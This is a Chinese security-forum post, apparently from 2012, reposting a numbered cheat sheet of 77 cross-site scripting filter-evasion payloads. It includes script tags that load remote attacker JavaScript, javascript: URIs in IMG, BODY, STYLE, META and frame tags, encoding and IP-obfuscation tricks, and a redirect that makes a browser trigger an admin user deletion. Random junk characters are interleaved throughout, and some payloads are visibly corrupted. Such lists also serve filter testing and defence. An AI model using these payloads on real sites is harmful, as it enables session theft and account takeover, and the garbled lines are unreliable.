貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。1 q- O1 S5 T3 u+ e
) F: ^# X; q/ X) w (1)普通的XSS JavaScript注入
7 K1 L2 B ^& @% `& l) H* r% A <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ d0 q, o) D5 O. j3 p$ l* r, M
" }* ^) a' k/ L+ W Q (2)IMG标签XSS使用JavaScript命令
0 E1 W. H8 \$ M2 b <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ I8 w' M6 | ?% i: ]6 _1 [
. o* p$ l& v9 d (3)IMG标签无分号无引号& t/ ]" _# w1 ?7 y) y
<IMG SRC=javascript:alert(‘XSS’)>
3 ?% |( L5 H. m9 A& _6 D7 A* J" R6 I$ z2 o: L) }5 P+ S
(4)IMG标签大小写不敏感3 c" K% z4 y# V3 k3 _4 V3 `$ ^% _
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>! \" \$ B% e+ v
I e) N" b/ \8 R- U- w% S
(5)HTML编码(必须有分号)# l4 l3 s$ R0 }# [
<IMG SRC=javascript:alert(“XSS”)>
4 k/ P9 F) Q; c- o, b& d5 x/ i- B/ Y2 k( Q" P/ X1 ]$ Z
(6)修正缺陷IMG标签2 ^' f v. I4 y+ e
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! K. V+ n) s, `* t
5 ^9 G, K$ H$ U& ~2 g (7)formCharCode标签(计算器)7 R( d1 V4 m: {1 ?8 D* e% h
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- ~- a& J8 h! ~
2 B$ ?" v0 X2 B2 Z- u& d
(8)UTF-8的Unicode编码(计算器)
# A: {7 `/ Y2 {( B2 v# U <IMG SRC=jav..省略..S')>
- Y2 N' w+ e* S; Z+ n& Z
+ U1 m( D- C3 w/ |( H/ O0 X- @ (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ o5 i# \0 ^3 p& [! X <IMG SRC=jav..省略..S')>; }# N2 I/ {; B1 T) y# M3 j
) k) `/ {. k& ^9 { (10)十六进制编码也是没有分号(计算器)& {' c* h' ]% I" \! M
<IMG SRC=java..省略..XSS')>( X, ?( q& y/ Q; \# T
6 g& v' J4 W4 i2 P4 R8 A3 w8 o
(11)嵌入式标签,将Javascript分开* x* w( @: \- J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: E' x4 C z( x' R/ h- k7 P9 P5 ~
" @ Z' u* E% J9 W$ n (12)嵌入式编码标签,将Javascript分开2 `9 P5 ]# @, u r! L* S/ B$ f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ }, g- X- Q3 F9 i- z
+ B$ y% Q* u, e7 G. s* I1 P0 W (13)嵌入式换行符* U$ i/ G0 G. T
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 @( n5 f6 X( m" j7 w j
. ]+ o |1 x% q; J
(14)嵌入式回车
+ q$ x& w' ]* O2 `8 t) S/ b T <IMG SRC=”jav ascript:alert(‘XSS’);”>
2 G8 o0 w5 |" |3 f( U& R7 s
8 E9 {+ j7 m# k* L- \1 o (15)嵌入式多行注入JavaScript,这是XSS极端的例子
' J) l) |6 f& {, Y <IMG SRC=”javascript:alert(‘XSS‘)”>( u9 o( T# u" [5 X( }' R) c$ v" I
2 a, `9 H, L, Z5 R% w (16)解决限制字符(要求同页面)4 h$ j7 d6 _$ B v! Z9 f8 a" S8 m0 |3 S
<script>z=’document.’</script>
* ~* S: O" w/ h: F! P; T9 ~ <script>z=z+’write(“‘</script>
# d: C- u- a: @- @: M$ Q <script>z=z+’<script’</script>7 {$ E9 v' G9 x! t5 a* c
<script>z=z+’ src=ht’</script>' O! c0 H* M, Q: M
<script>z=z+’tp://ww’</script>
8 y2 z4 s' i/ Z. R7 P6 I. y <script>z=z+’w.shell’</script>
( e/ l& v$ I) H <script>z=z+’.net/1.’</script>
# K- n* M6 H* H0 u9 V+ p& } <script>z=z+’js></sc’</script>
+ T9 y3 _7 K! }6 s <script>z=z+’ript>”)’</script>
6 W& T2 P& l$ z+ f- k <script>eval_r(z)</script>
; O% ]/ O9 u6 R( ~% }
|8 Z) F/ P6 }4 P8 k. i5 A (17)空字符
0 s+ B& `" X" i' e, [8 _8 V; h perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 d* W* }0 H ]+ [6 ^7 f, `+ n6 m* t& W, _$ A/ ` O
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: G/ Q+ q/ H4 D, Z3 ]( m
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: Q% ~6 p4 ?+ x3 X; E5 A* B! L+ |
! o. ^3 l1 T" H/ I/ s7 ^
(19)Spaces和meta前的IMG标签
2 d; n4 |0 {# c, O <IMG SRC=” � javascript:alert(‘XSS’);”>
# M- B0 f0 T N. ~7 S) L
$ W) T8 G: |" ^4 h1 `# T (20)Non-alpha-non-digit XSS
7 w$ b2 @! B4 |8 C( Q: S1 _ s, n <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, h& q$ e0 a4 B f6 ^; Z$ C3 ]1 s. L8 C+ K% W# _
(21)Non-alpha-non-digit XSS to 2
6 J6 m ]- t r5 d- x <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! M& t% e8 _- q( X4 E# T8 Z6 u7 I+ ~& e" t
(22)Non-alpha-non-digit XSS to 3 v2 U6 S5 F% f2 |
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ H: j- P& U% ^+ R9 q# v) A
6 @/ L8 m y- `. A
(23)双开括号
4 T' z3 m0 m- H% a2 l <<SCRIPT>alert(“XSS”);//<</SCRIPT>: B" L+ h/ d/ a0 m
& M" Y( _* e' k. Q, }
(24)无结束脚本标记(仅火狐等浏览器)
# k* b) y" Z! v <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( e5 m9 A9 S' X& _& O: U3 A$ {
, E7 Q* U! t% \' T. C! o8 |7 p% a/ k
(25)无结束脚本标记2
* p( C/ D9 v: ^, `$ E( D <SCRIPT SRC=//3w.org/XSS/xss.js>" T2 x* l, F6 ~ q2 c( f
. k' V: E' h) p9 \: u$ v4 t (26)半开的HTML/JavaScript XSS
6 c p1 I+ l! y, u: } <IMG SRC=”javascript:alert(‘XSS’)”- R; V: Z% O; k$ r# x
) ^5 i0 i5 r0 `
(27)双开角括号
) g* R0 n# L. M. g9 i* M* [ <iframe src=http://3w.org/XSS.html <
8 F5 D& D* {4 b- E$ \/ n5 ?& ~2 A
/ P, P/ Q: g1 Q) \- i (28)无单引号 双引号 分号
0 h; j5 c2 P; z% ] <SCRIPT>a=/XSS/- H# c9 B3 l8 x1 v$ k5 D
alert(a.source)</SCRIPT>! ]) P3 w A/ q
" E8 N1 l0 l( y6 p$ K
(29)换码过滤的JavaScript p8 p ?$ G& N) W
\”;alert(‘XSS’);//3 h2 b: H3 X& D, X
* _8 ^# K' ]+ F/ @ (30)结束Title标签 [) |# f. ]' c3 m: c, d0 X
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& g) r* A9 l2 g/ ?0 l; F- T
0 [6 ^5 G: `% v7 U8 o: L7 {, w3 T
(31)Input Image6 d" Y6 Z5 J$ E; N) ^
<INPUT SRC=”javascript:alert(‘XSS’);”>
% N$ }2 Z: y: }" P5 C+ f9 h1 A; @3 z
(32)BODY Image0 _+ |* ?) ~( @+ _8 R: y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 S4 n7 J% k& k. |* \1 n
; N+ _0 f/ @% c* E' x5 r4 z (33)BODY标签
% g* W: G2 r5 U: {, R: e <BODY(‘XSS’)>
" }8 I2 W% I, s3 `5 L
; E7 e1 Q0 i4 I4 L9 i1 {; h G (34)IMG Dynsrc
$ h# p- v5 q) v3 {' m% @" N& D <IMG DYNSRC=”javascript:alert(‘XSS’)”>
) F) i9 ^8 U# m/ a3 O% D2 x
3 e2 L, c. a3 p (35)IMG Lowsrc
9 G+ w7 w& b" I- M& x y" U7 { <IMG LOWSRC=”javascript:alert(‘XSS’)”>
) ]( Q2 q8 k3 ~4 Z1 m) A* L u7 {8 ]
4 A5 V) i. J/ P% Q6 u% ] (36)BGSOUND0 g+ l* D( x7 h- h
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" ^+ y/ Y* I/ E
1 e, T0 d. i8 \/ p+ E (37)STYLE sheet, Q+ T5 I& y9 |0 o+ a( `7 e! A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 b3 H3 y6 z. F7 W0 e; S5 `4 C" m! ?7 \0 |1 X p
(38)远程样式表3 Z6 ?4 R5 i# S. }; I2 X% S( S
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 }: x: a+ B" N
) H1 w& A( Q& `$ ^, _6 @' m; ^+ C (39)List-style-image(列表式)
: J. u! b6 ^3 g$ L <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: }8 A; D% F7 K8 g$ K. {$ ?
# M8 a7 R' a+ F( U P- H (40)IMG VBscript* W! }6 f6 J2 B* u8 }& @
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( n, l% @" x+ w" k7 h: }! U
8 Z3 A" f: i1 t6 E5 C (41)META链接url! n8 p7 W0 |( K: l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' b% w m& `5 i
7 y3 A* H, k, O! I6 [& @: B) \ @/ S (42)Iframe
# c8 U* }: P5 |9 Z <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- K7 U6 U( X2 `* O& w! |( m
; ^6 _' j; b( X A9 y (43)Frame
! I. G; ~' u: O <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>3 o, i" d1 s5 a2 s+ J" |
; A3 m. C7 b$ H/ i' d: t. M (44)Table
0 F+ |* [% m0 \- N+ `6 w <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>/ N' ~; o; R/ w1 B! c- N$ p0 a
4 B' Y2 Q3 F0 b' M0 `+ y4 `- z
(45)TD2 S+ t& {+ n( A- O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! f U3 N6 I, E. S2 E% R( {/ t" E
1 j( b: `2 A3 Z" | (46)DIV background-image
- }" A% U& Q& S6 O7 Y <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 t1 J# a6 H5 J0 ]+ x/ L) a4 m, ]. s$ a7 I
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 U1 [: I& w- R* o2 D# N <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>" w3 j- x8 F/ a5 N, `+ X+ ]0 c$ x
; i$ t9 w7 y0 I0 h7 c (48)DIV expression' Q4 K0 }( C9 ^8 Q4 X
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 H* E9 Z& I5 X: f8 n# [- t
* X/ f$ W) X B' F4 i0 [. F; Q" f$ l (49)STYLE属性分拆表达
" j. H- b8 n+ p/ q% ]/ b3 y0 a <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
, {( q6 U" B% Y/ F8 P* |9 m$ W1 G4 b
+ T, K& W- }' ~' G4 O% B7 h& L2 K (50)匿名STYLE(组成:开角号和一个字母开头)
+ E% Z: j0 |7 X6 P9 ^) w) X <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>" y" b7 Q" p2 k
8 R3 U" k$ t: o @$ _0 M8 T (51)STYLE background-image: }! ~' o* B/ u, L, J
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, x2 f8 |0 j" `, x
% q( e" q. Y$ e& L8 ~1 R6 l
(52)IMG STYLE方式 z! r! n; h; M3 _: G- m/ @
exppression(alert(“XSS”))’>
* l9 q- ^: t2 r# `; e6 }% B1 M/ O) V& X4 o* P# X) w& M4 Z( I
(53)STYLE background
3 ~; [* t1 g3 j l: [3 V2 @ <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
e1 ~( S B m2 s) ^+ G, V* B8 V1 |. k- e
(54)BASE
+ ~! r/ b( |, f) a" d' I/ {5 \ <BASE HREF=”javascript:alert(‘XSS’);//”>$ r( j5 o- E0 V+ v( ?/ @
8 f# k0 X4 G9 Y0 t G (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" x/ r/ ?$ R) M# @' V! ?8 g# a6 M% r <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 L4 [& f Q! q; ^$ z) U4 H/ {
# P. R' T: T2 k& T2 q (56)在flash中使用ActionScrpt可以混进你XSS的代码
# }2 v, W6 D, w/ L: v5 C a=”get”; D2 N4 [; U2 U( x; V3 H
b=”URL(\”";9 O8 h! j6 R6 z' m% C! t
c=”javascript:”;! a3 J: [0 _5 D @2 L
d=”alert(‘XSS’);\”)”;
- G2 {/ x, D! v8 e% V) v eval_r(a+b+c+d);
9 q! T6 h# P1 Z: N
2 X- @* }! z. q8 q" \/ r. m2 f (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上, O) A. V9 P, d. C, |6 p
<HTML xmlns:xss>
/ n$ A* `. [, c. M- [0 }$ S$ l <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 T; J6 H5 R3 n% R' B5 @6 Y' N
<xss:xss>XSS</xss:xss>
; f" M1 ^3 y1 m. x8 ^( I7 j' R </HTML>0 W- h3 l/ j; ]9 p
6 m/ v i# G7 h) G4 `2 n
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, _7 L9 U% K g1 C <SCRIPT SRC=””></SCRIPT>6 p9 q8 c, ~' F( a* E
, k Q% l* `! @! {. J. Z6 C. r. R4 g- J4 s (59)IMG嵌入式命令,可执行任意命令5 j) x: t5 ?0 X- o" y7 B/ \
<IMG SRC=”http://www.XXX.com/a.php?a=b”>! {' F6 [# Y9 ~& @
+ I5 i- X! |1 C! Z7 y& B. U i m3 V. |
(60)IMG嵌入式命令(a.jpg在同服务器)5 h4 N* S E$ x; l$ J* `4 A }) t
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, \0 Z: S& }' p! K, `+ J9 i+ w2 b( K# \' W# ]
(61)绕符号过滤0 `7 o$ \9 P: q. c6 G! B
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ |! X$ v W, z1 T$ q1 s
; f, Q# L$ s/ ~ (62)7 I3 q: z& g9 _5 ]3 Z9 ]
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& Y8 Y4 I- z% q/ l- h9 F
- i* n* b$ ]/ z/ w! l' a (63)6 U& b z m$ ?' T. S# C& m0 } h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
$ D# B" Q0 I1 {0 p7 b' I5 X. z8 E' d3 `# {# r+ {0 _
(64)
5 N) e* e8 x, x0 d <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>! i+ C# ?6 Q6 `$ i# W; D( F& T
4 E' \) V. S. ^ (65)
/ b& q7 n6 T3 ]3 M6 q3 K <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ j. Z& u4 ]# }8 N/ R5 y" c, T3 ?7 S! s0 u
(66)
# [+ X& y# y5 b: L2 D- G' w' @ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 S a8 T4 |& x! t
$ c# c8 {# r0 `! o" c$ T (67)0 N# u% Y% N" r/ R
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
( X: B7 G* C8 i
1 t3 i5 Q$ t: w j. o6 Y9 N9 e. q (68)URL绕行; ], h9 f5 X+ C4 W% |
<A HREF=”http://127.0.0.1/”>XSS</A>- c8 T, T) t6 v6 X- U
@+ A8 e% K% h+ W& _ (69)URL编码
+ T$ E+ I" F& R$ p4 K <A HREF=”http://3w.org”>XSS</A>5 S' Y9 [/ |2 x; u& x0 b
/ T" z; @/ q" w3 l% p' M# i! E4 y (70)IP十进制 I( t, E" m6 c }& A& o' K
<A HREF=”http://3232235521″>XSS</A>, o/ L+ E9 t. E) j% | c2 a
$ f" @8 D* w$ N8 o& r (71)IP十六进制
, i3 r4 j- U/ @- l9 A( w( V <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 @3 m7 g9 N9 t8 o4 b# {' q* P
- i0 }. o9 ~. T0 h9 z6 M (72)IP八进制
+ V! D. h9 R- i/ e5 Z/ x6 T. q <A HREF=”http://0300.0250.0000.0001″>XSS</A>- |1 }4 N% q& o4 x, x) W3 L% C
! M9 l9 J7 I5 M4 m# _
(73)混合编码' R6 ]# \2 P" T4 }/ k" L: B
<A HREF=”h
g& f D4 I/ K* _+ h) u tt p://6 6.000146.0×7.147/”">XSS</A>' y7 r5 [/ R& o; K5 k
( |3 i' v$ f' M+ u' n$ i { (74)节省[http:]
; N- A2 D* s$ s# P <A HREF=”//www.google.com/”>XSS</A>6 Q: H! w2 l8 Z! o3 s
4 d! e9 z1 `4 j) X5 S
(75)节省[www]9 i, L$ S. \4 [! @, C' \3 S1 W
<A HREF=”http://google.com/”>XSS</A>; s; m0 S1 ]0 i% b0 Z( @: S3 z
9 z" i# F9 H$ P
(76)绝对点绝对DNS
0 N& @# Q! u8 d7 E <A HREF=”http://www.google.com./”>XSS</A>1 o9 ^/ m" r0 S: t: I$ I
+ n% o" J% ?' `) W8 N# @" X4 G+ r
(77)javascript链接) `0 U. ]! L7 m, W
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对